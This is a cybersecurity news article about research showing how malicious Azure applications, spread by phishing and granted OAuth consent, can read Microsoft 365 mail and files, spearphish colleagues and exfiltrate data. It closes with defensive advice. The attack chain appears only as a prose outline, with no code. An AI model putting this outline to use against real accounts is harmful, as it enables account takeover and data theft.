Researchers warn Microsoft 365 account holders to pay attention to unknown applications that request permissions.

Kelly Sheridan, Former Senior Editor, Dark Reading

March 24, 2020

4 Min Read

Microsoft Azure applications could be weaponized to break into Microsoft 365 accounts, report researchers who are investigating new attack vectors as businesses transition to cloud environments.

The Varonis research team encountered this vector while exploring different ways to exploit Azure, explains security researcher Eric Saraga. While they found a few campaigns intended to use Azure applications to compromise accounts, they discovered little coverage of the dangers. They decided to create a proof-of-concept apps to demonstrate how this attack might work. It's worth noting they did not discover a flaw within Azure, but instead detail ways its existing features could be maliciously used. 

"We decided to do the proof of concept after seeing potential danger — not from any specific trends," he says. "However, if anybody is utilizing what we described here to launch attacks, it will most certainly be an [advanced persistent threat] group or a very sophisticated attacker." As the cloud advances, Saraga anticipates we'll start seeing campaigns designed to use simpler versions of this attack.

Microsoft built the Azure App Service so that developers could create custom cloud applications to call and consume Azure APIs and resources. It's meant to simplify the process of building programs that integrate with different components of Microsoft 365. The Microsoft Graph API, for example, lets apps communicate with co-workers, groups, OneDrive documents, Exchange Online mailboxes, and conversations across a single person's Microsoft 365 platform.

Before an app can do this, however, it must first ask an employee for access to the resources it needs. An attacker who designs a malicious app and deploys it via phishing campaign could trick someone into granting them access to resources within the cloud. Azure applications don't require Microsoft's approval or code execution on a victim's machine, researchers point out; as a result, it's easier for them to evade security systems.

An attacker must first have a web application and Azure tenant to host it. From there, phishing emails are the most effective way for them to gain a foothold, says Saraga. An attacker could send a message with a link to install the malicious Azure app; this link would direct the user to an attacker-controlled site, which would redirect the user to Microsoft's login page. 

"The authentication is handled and signed by Microsoft; therefore, even educated users might be fooled," he notes. Once the victim logs in to his or her Microsoft 365 instance, a token is created for the app and the user will be prompted to grant permissions. The prompt will look familiar to anyone who has installed an app in SharePoint or Teams; however, it's also where victims may see a red flag: "This application is not published by Microsoft or your organization."

This is the only clue that might indicate foul play, Saraga notes, but many people are likely to click "accept" without thinking twice about it. From there, a victim won't know someone unauthorized is there unless the intruder modifies or creates objects that are visible to the user, he explains.

With these permissions, an attacker would be able to read emails or access files as they wish. This tactic is ideal for reconnaissance, launching employee-to-employee spearphishing attacks, and stealing files and emails from Office 365, Saraga adds. "By reading the user's emails, we can identify the most common and vulnerable contacts, send internal spearphishing emails that come from our victim, and infect his peers," he writes in a blog post on the findings. "We can also use the victim's email account to exfiltrate data that we find in 365." 

Flying Under the Radar
Granting access to an Azure app is not very different from running a malicious executable or enabling macros in a malicious file, Saraga notes. But because this technique does not require executing code on the endpoint, it is difficult to detect and block.

Microsoft does not recommend disabling third-party applications altogether as it prevents users from granting consent on a tenant-wide basis and limits their ability to fully leverage third-party apps. Given this, Saraga advises paying close attention to the warning text that appears when an unknown application asks for permissions.

"First, keep a close eye on new Azure applications. Then decide if they are trustworthy or not: Are they verified? Do you know the developer? Can you trust it?" he advises. "Second, monitor user activity across the organization. Abnormal activity might indicate a compromise."

Related Content:

Check out The Edge, Dark Reading's new section for features, threat data, and in-depth perspectives. Today's featured story: "Three Ways Your BEC Defense Is Failing & How to Do Better."

About the Author(s)

Kelly Sheridan

Former Senior Editor, Dark Reading

Kelly Sheridan was formerly a Staff Editor at Dark Reading, where she focused on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial services. Sheridan earned her BA in English at Villanova University. You can follow her on Twitter @kellymsheridan.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like


More Insights